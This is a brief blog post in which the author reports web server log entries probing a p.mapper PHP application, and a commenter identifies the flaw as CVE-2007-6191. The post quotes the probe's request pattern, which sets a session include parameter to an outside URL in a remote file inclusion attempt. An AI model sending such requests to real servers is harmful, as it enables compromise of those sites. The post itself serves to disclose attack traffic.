GET /<directory-path>/pmapper-3.2-beta3/incphp/globals.php?__SESSION[PM_INCPHP]=<some-url>?" where replace the <directory-path> and the <some-url> with a path on your server and some random website respectively. It appears to be a probe to test for some vulnerability but I don't have the full request logged, only the request up to the question mark on the GET request so the payload isn't logged. The changing URLs are probably to throw people off the scent.I must confess, I had no idea what this "pmapperr" application was before I observed these hits and nor do I have PHP installed on my webserver but I figure if I mention it on this blog, an audience who may be able to investigate can do something.
Oh well, I have done my part.
1 comment:
Antony,
The security vulnerability that folks are trying to exploit on your site is explained here:
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-6191
hope that helps you and others!
-Sheeri
Post a Comment